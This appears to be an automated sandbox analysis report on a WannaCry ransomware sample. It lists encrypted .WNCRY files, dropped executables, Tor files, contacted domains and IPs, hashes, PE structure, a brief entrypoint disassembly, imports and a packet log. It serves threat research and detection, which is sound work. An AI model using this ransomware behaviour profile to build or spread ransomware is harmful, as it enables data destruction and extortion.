C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif.WNCRYT
  • Type: data
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRY (copy)
  • Type:
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793060[[fn=Origin]].dotx.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793060[[fn=Origin]].dotx.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\6SKQ9IC9.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\6SKQ9IC9.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\70BQC459.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\70BQC459.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\BQV5SLZ9.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\BQV5SLZ9.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\EVRD7JOF.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\EVRD7JOF.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\I75LB17C.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\I75LB17C.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\ML8FX5YH.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\ML8FX5YH.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\P2JX6PN9.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\P2JX6PN9.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\SBGGU5ON.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\SBGGU5ON.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\TS324TLF.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\TS324TLF.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\XO4C6RUK.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\XO4C6RUK.txt.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRYT
  • Type: data
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt.WNCRYT
  • Type: data
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db.WNCRYT
  • Type: data
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt.WNCRYT
  • Type: data
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db.WNCRYT
  • Type: data
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js.WNCRYT
  • Type: data
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt.WNCRYT
  • Type: data
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db.WNCRYT
  • Type: data
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js.WNCRYT
  • Type: data
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore.js.WNCRY (copy)
  • Type:
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore.js.WNCRYT
  • Type: data
true
C:\Users\luketaylor\Desktop\@WanaDecryptor@.bmp
  • Type: PC bitmap, Windows 3.x format, 800 x 600 x 24
false
C:\Users\luketaylor\Desktop\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
true
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs (copy)
  • Type:
false
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp
  • Type: ASCII text, with CRLF line terminators
true
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus (copy)
  • Type:
false
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp
  • Type: ASCII text, with CRLF line terminators
true
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new
  • Type: ASCII text, with very long lines
true
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state (copy)
  • Type:
false
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp
  • Type: ASCII text, with CRLF line terminators
true
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus (copy)
  • Type:
false
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
  • Type: ASCII text, with CRLF line terminators
true
C:\Windows\Temp\hibsys.WNCRYT
  • Type: VISX image file
false
C:\Windows\tasksche.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
false
C:\autoexec.bat.WNCRY (copy)
  • Type:
false
C:\autoexec.bat.WNCRYT
  • Type: data
false

Contacted Domains/Contacted IPs

Contacted Domains

| Name | IP | Active | Malicious |
| --- | --- | --- | --- |
| www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 144.217.74.156 | true | false |

Contacted IPs

| IP | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- |
| 95.130.12.119 | France | 23456 | 32bitTransitionAS | false |
| 195.154.107.23 | France | 12876 | ONLINESAS | true |
| 8.8.8.8 | United States | 15169 | GoogleInc | false |
| 79.137.85.71 | Italy | 34695 | E4Asrl | true |
| 85.235.250.88 | Denmark | 9167 | WEBPARTNERASisaDanishInternetServiceProvider | false |
| 131.188.40.189 | Germany | 680 | VereinzurFoerderungeinesDeutschenForschungsnetzes | false |
| 144.217.74.156 | United States | 11714 | UniversityofNebraskaCentralAdministration | false |
| 138.68.0.4 | United States | 17007 | OrbitalSciencesCorporation | true |

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:mssecsvc.exe
File size:3723264
MD5:db349b97c37d22f5ea1d1841e3c89eb4
SHA1:e889544aff85ffaf8b0d0da705105dee7c97fe26
SHA256:24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
SHA512:d6c60b8f22f89cbd1262c0aa7ae240577a82002fb149e9127d4edf775a25abcda4e585b6113e79ab4a24bb65f4280532529c2f06f7ffe4d5db45c0caf74fea38
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..

Static PE Info

General

Entrypoint:0x409a16
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x4CE78ECC [Sat Nov 20 09:03:08 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:9ecee117164e0b870a53dd187cdd7174

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0040A1A0h
push 00409BA2h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0040A0C0h]
pop ecx
or dword ptr [0070F894h], FFFFFFFFh
or dword ptr [0070F898h], FFFFFFFFh
call dword ptr [0040A0C8h]
mov ecx, dword ptr [0070F88Ch]
mov dword ptr [eax], ecx
call dword ptr [0040A0CCh]
mov ecx, dword ptr [0070F888h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0040A0E4h]
mov eax, dword ptr [eax]
mov dword ptr [0070F890h], eax
call 00007F4738B49D21h
cmp dword ptr [00431410h], ebx
jne 00007F4738B49C0Eh
push 00409B9Eh
call dword ptr [0040A0D4h]
pop ecx
call 00007F4738B49CF3h
push 0040B010h
push 0040B00Ch
call 00007F4738B49CDEh
mov eax, dword ptr [0070F884h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0070F880h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040A0DCh]
push 0040B008h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa1e0 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x310000 | 0x35a454 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x188 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

NameVirtual AddressVirtual SizeRaw SizeEntropyXored PEZLIB ComplexityFile TypeCharacteristics
.text0x10000x8bca0x9000False0.534450954861data6.13459082812IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0xa0000x9980x1000False0.29345703125data3.50361558618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0xb0000x30489c0x27000IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ0xb000
.rsrc0x3100000x35a4540x35b000IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ0x32000

Resources

Name | RVA | Size | Type | Language | Country
R | 0x3100a4 | 0x35a000 | PE32 executable (GUI) Intel 80386, for MS Windows | English | United States
RT_VERSION | 0x66a0a4 | 0x3b0 | data | English | United States

Imports

DLL | Import
KERNEL32.dll | WaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
ADVAPI32.dll | StartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
WS2_32.dll | closesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
MSVCP60.dll | ??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
iphlpapi.dll | GetAdaptersInfo, GetPerAdapterInfo
WININET.dll | InternetOpenA, InternetOpenUrlA, InternetCloseHandle
MSVCRT.dll | __set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc

Version Infos

Description | Data
LegalCopyright | Microsoft Corporation. All rights reserved.
InternalName | lhdfrgui.exe
FileVersion | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
CompanyName | Microsoft Corporation
ProductName | Microsoft Windows Operating System
ProductVersion | 6.1.7601.17514
FileDescription | Microsoft Disk Defragmenter
OriginalFilename | lhdfrgui.exe
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

TCP Packets

TimestampSource PortDest PortSource IPDest IP
May 12, 2017 18:54:28.012767076 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.012794971 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.012824059 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.020284891 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.020298958 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.020530939 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.020562887 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.021789074 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.022063017 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.022094965 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.022106886 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.022186041 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.026417971 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.026433945 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.026448965 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.026669979 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.031402111 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.031416893 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.031424999 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.031611919 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.034810066 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.034826994 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.034837961 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.035020113 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.037075043 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.037089109 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.037096024 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.037180901 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.040888071 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.040909052 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.040927887 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.041018963 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.045464039 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.045485973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.045494080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.045633078 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.046329021 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.051772118 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.051786900 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.051796913 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.051914930 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.052417994 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.052438974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.052445889 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.052731991 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.058815002 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.058842897 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.058866024 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.060700893 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.061831951 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.061851978 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.061862946 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.062159061 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.071243048 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.071260929 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.071278095 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.071356058 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.071367025 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.071569920 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.071609974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.072329998 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.072344065 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.072587967 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.072623968 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.073822021 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.074623108 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.084407091 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.084424973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.084453106 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.084574938 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.093501091 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.093527079 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.093550920 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.093641043 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.094414949 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.094435930 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.094443083 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.094571114 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.103705883 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.103727102 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.103734970 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.103800058 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.108361006 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.108381033 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.108392954 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.108509064 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.116760015 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.116786957 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.116803885 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.116950989 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.117707014 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.117732048 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.117744923 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.117883921 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.118158102 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.131680965 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.131706953 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.131720066 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.131827116 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.148926973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.148947954 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.148956060 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.149072886 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.166949034 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.166980982 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.167002916 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.167150021 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.175476074 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.175512075 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.175524950 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.175679922 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.176428080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.176476955 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.176486015 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.176598072 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.190692902 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.190721035 CEST44349196131.188.40.189192.168.1.16
